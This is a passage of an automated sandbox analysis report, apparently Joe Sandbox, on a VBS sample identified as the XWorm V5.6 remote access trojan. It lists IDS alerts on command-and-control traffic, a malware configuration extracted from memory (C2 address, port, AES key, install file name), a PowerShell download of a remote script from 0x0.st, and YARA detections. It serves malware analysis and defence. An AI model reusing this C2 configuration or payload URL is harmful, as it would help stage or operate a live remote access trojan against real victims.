                2025-02-15T20:44:16.428869+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                2025-02-15T20:44:16.574977+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.241.208.215 | 7000 | TCP
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2025-02-15T20:43:34.393856+0100 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49736 | 185.241.208.215 | 7000 | TCP
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2025-02-15T20:44:06.555717+0100 | 2853191 | 1 | Malware Command and Control Activity Detected | 185.241.208.215 | 7000 | 192.168.2.4 | 49736 | TCP
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2025-02-15T20:44:06.280176+0100 | 2853192 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49736 | 185.241.208.215 | 7000 | TCP
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2025-02-15T20:43:17.557553+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49734 | 168.119.145.117 | 443 | TCP
                2025-02-15T20:43:34.144742+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49738 | 168.119.145.117 | 443 | TCP
                2025-02-15T20:43:47.055557+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49739 | 168.119.145.117 | 443 | TCP
                2025-02-15T20:44:00.816978+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49740 | 168.119.145.117 | 443 | TCP
                2025-02-15T20:44:14.396511+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49759 | 168.119.145.117 | 443 | TCP
                2025-02-15T20:45:16.041932+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.4 | 50042 | 168.119.145.117 | 443 | TCP
                2025-02-15T20:45:16.058701+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.4 | 50044 | 168.119.145.117 | 443 | TCP
                2025-02-15T20:45:16.063078+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.4 | 50043 | 168.119.145.117 | 443 | TCP
                2025-02-15T20:45:16.201202+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.4 | 50045 | 168.119.145.117 | 443 | TCP
                2025-02-15T20:45:16.339155+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.4 | 50047 | 168.119.145.117 | 443 | TCP

                AV Detection

                Source: 00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["185.241.208.215"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                Source: Xclient.vbs | Virustotal: Detection: 8%
                Source: Xclient.vbs | ReversingLabs: Detection: 27%
                Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.3% probability
                Source: 00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmp | String decryptor: 185.241.208.215
                Source: 00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmp | String decryptor: 7000
                Source: 00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmp | String decryptor: <123456789>
                Source: 00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmp | String decryptor: <Xwormmm>
                Source: 00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmp | String decryptor: XWorm V5.6
                Source: 00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmp | String decryptor: USB.exe
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:49740 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:49759 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:50042 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:50044 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:50043 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:50045 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:50047 version: TLS 1.2
                Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
                Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
                Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\
                Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\
                Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\
                Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\

                Software Vulnerabilities

                Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 00007FFD9B8C6955h | 5_2_00007FFD9B8C625D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 00007FFD9B8C6966h | 5_2_00007FFD9B8C625D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 00007FFD9B8C5B9Bh | 5_2_00007FFD9B8C59F2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 00007FFD9B8C7576h | 5_2_00007FFD9B8C0CB0

                Networking

                Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49736 -> 185.241.208.215:7000
                Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 185.241.208.215:7000 -> 192.168.2.4:49736
                Source: Network trafficSuricata IDS: 2852873 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 : 192.168.2.4:49741 -> 185.241.208.215:7000
                Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49741 -> 185.241.208.215:7000
                Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49736 -> 185.241.208.215:7000
                Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 185.241.208.215:7000 -> 192.168.2.4:49736
                Source: Network trafficSuricata IDS: 2853192 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.4:49736 -> 185.241.208.215:7000
                Source: Network trafficSuricata IDS: 2853191 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound : 185.241.208.215:7000 -> 192.168.2.4:49736
                Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 185.241.208.215:7000 -> 192.168.2.4:49741
                Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 185.241.208.215:7000 -> 192.168.2.4:50051
                Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:50051 -> 185.241.208.215:7000
                Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 185.241.208.215:7000 -> 192.168.2.4:50051
                Source: Malware configuration extractorURLs: 185.241.208.215
                Source: global trafficTCP traffic: 192.168.2.4:49736 -> 185.241.208.215:7000
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                Source: Joe Sandbox ViewIP Address: 168.119.145.117 168.119.145.117
                Source: Joe Sandbox ViewASN Name: GBTCLOUDUS GBTCLOUDUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: ip-api.com
                Source: unknownDNS query: name: ip-api.com
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49734 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49738 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49740 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49739 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49759 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:50045 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:50042 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50015 -> 204.79.197.203:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:50047 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:50043 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:50044 -> 168.119.145.117:443
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: unknown | TCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
                Source: global traffic | DNS traffic detected: DNS query: 0x0.st
                Source: global traffic | DNS traffic detected: DNS query: ip-api.com
                Source: global traffic | DNS traffic detected: DNS query: api.msn.com
                Source: powershell.exe, 00000005.00000002.2325412269.000001D313C04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945403188.000001D7CD0F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2074612069.000001E1AA55A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2248750195.000002CC07437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2323673539.0000020600C04000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://0x0.st
                Source: svchost.exe, 0000001F.00000003.2316380909.0000028695218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                Source: svchost.exe, 0000001F.00000003.2316380909.0000028695218000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                Source: qmgr.db.31.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                Source: qmgr.db.31.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                Source: svchost.exe, 0000001F.00000003.2316380909.0000028695218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                Source: svchost.exe, 0000001F.00000003.2316380909.0000028695218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                Source: svchost.exe, 0000001F.00000003.2316380909.000002869524D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                Source: qmgr.db.31.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                Source: powershell.exe, 00000005.00000002.2325412269.000001D3133DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2325412269.000001D312D1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2325412269.000001D3133D8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
                Source: powershell.exe, 00000005.00000002.2325412269.000001D312D1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2325412269.000001D3133C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hosting
                Source: powershell.exe, 00000005.00000002.2547321212.000001D322523000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000005.00000002.2325412269.000001D3126D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000005.00000002.2325412269.000001D3124B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945403188.000001D7CC4F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2074612069.000001E1A9956000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2248750195.000002CC06836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2323673539.0000020600006000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000005.00000002.2325412269.000001D3126D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000005.00000002.2325412269.000001D313B49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945403188.000001D7CCDF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945403188.000001D7CC71D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2074612069.000001E1AA4A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2074612069.000001E1A9B7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2248750195.000002CC0715A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2248750195.000002CC06A5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2323673539.000002060022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2323673539.0000020600903000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://0x0.st
                Source: powershell.exe, 0000001C.00000002.2323673539.0000020600903000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://0x0.st/8KuV.ps1
                Source: powershell.exe, 00000005.00000002.2325412269.000001D3124B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945403188.000001D7CC4F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2074612069.000001E1A9956000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2248750195.000002CC06836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2323673539.0000020600006000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000005.00000002.2547321212.000001D322523000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000005.00000002.2547321212.000001D322523000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000005.00000002.2547321212.000001D322523000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                Source: svchost.exe, 0000001F.00000003.2316380909.00000286952C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.dr | String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                Source: svchost.exe, 0000001F.00000003.2316380909.00000286952FF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.2316380909.000002869520E000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                Source: svchost.exe, 0000001F.00000003.2316380909.00000286952C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                Source: svchost.exe, 0000001F.00000003.2316380909.00000286952A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.2316380909.0000028695307000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.2316380909.00000286952C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.2316380909.00000286952E8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                Source: svchost.exe, 0000001F.00000003.2316380909.00000286952C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                Source: powershell.exe, 00000005.00000002.2325412269.000001D3126D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000005.00000002.2325412269.000001D3133E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
                Source: powershell.exe, 00000005.00000002.2547321212.000001D322523000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                Source: svchost.exe, 0000001F.00000003.2316380909.00000286952C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                Source: svchost.exe, 0000001F.00000003.2316380909.0000028695272000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknown | Network traffic detected: HTTP traffic on port 50042 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50043
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50042
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50045
                Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50044
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50047
                Source: unknown | Network traffic detected: HTTP traffic on port 50047 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 50043 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 50044 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknown | Network traffic detected: HTTP traffic on port 50045 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49759
                Source: unknown | Network traffic detected: HTTP traffic on port 49759 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:49740 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:49759 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:50042 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:50044 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:50043 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:50045 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:50047 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: Yara match | File source: 5.2.powershell.exe.1d3133b65d0.8.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 18.2.powershell.exe.1e1aa26a4b0.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 23.2.powershell.exe.2cc0714a0b0.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 28.2.powershell.exe.20601de4450.13.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 28.2.powershell.exe.206008ed970.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 23.2.powershell.exe.2cc07141480.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 18.2.powershell.exe.1e1aa248728.8.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 23.2.powershell.exe.2cc07127e40.3.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 28.2.powershell.exe.206008f65a0.7.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 28.2.powershell.exe.20601dfa830.9.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 28.2.powershell.exe.20601dfa830.9.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 11.2.powershell.exe.1d7ce2d5060.3.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 11.2.powershell.exe.1d7ccde7168.12.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 28.2.powershell.exe.20601de4450.13.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 11.2.powershell.exe.1d7e4bb0000.16.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 11.2.powershell.exe.1d7ce2eb440.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 18.2.powershell.exe.1e1aa261880.9.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 28.2.powershell.exe.206008f65a0.7.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 11.2.powershell.exe.1d7ccdde538.9.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 28.2.powershell.exe.206008ed970.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 18.2.powershell.exe.1e1aa248728.8.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.powershell.exe.1d3133ad9a0.3.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 11.2.powershell.exe.1d7ce2eb440.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 11.2.powershell.exe.1d7e4bb0000.16.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.powershell.exe.1d3133975c0.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 23.2.powershell.exe.2cc07127e40.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000001C.00000002.2323673539.00000206008C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000001C.00000002.2323673539.0000020601DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000001C.00000002.2323673539.0000020601DC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2325412269.000001D313377000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.1945403188.000001D7CE2B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.1945403188.000001D7CE2E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.1969459274.000001D7E4BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000017.00000002.2248750195.000002CC070F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.1945403188.000001D7CCDB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000001C.00000002.2323673539.0000020601DE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2720, type: MEMORYSTR
                Source: 5.2.powershell.exe.1d32a870000.9.raw.unpack, RemoteDesktop.cs | .Net Code: GetScreen

                System Summary

                Source: 5.2.powershell.exe.1d3133b65d0.8.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings | Author: Sekoia.io
                Source: 5.2.powershell.exe.1d3133b65d0.8.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                Source: 18.2.powershell.exe.1e1aa26a4b0.1.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings | Author: Sekoia.io
                Source: 18.2.powershell.exe.1e1aa26a4b0.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                Source: 23.2.powershell.exe.2cc0714a0b0.4.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings | Author: Sekoia.io
                Source: 23.2.powershell.exe.2cc0714a0b0.4.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                Source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings | Author: Sekoia.io
                Source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                Source: 18.2.powershell.exe.1e1aa26a4b0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings | Author: Sekoia.io
                Source: 18.2.powershell.exe.1e1aa26a4b0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                Source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings | Author: Sekoia.io
                Source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                Source: 28.2.powershell.exe.20601de4450.13.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings | Author: Sekoia.io
                Source: 28.2.powershell.exe.20601de4450.13.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
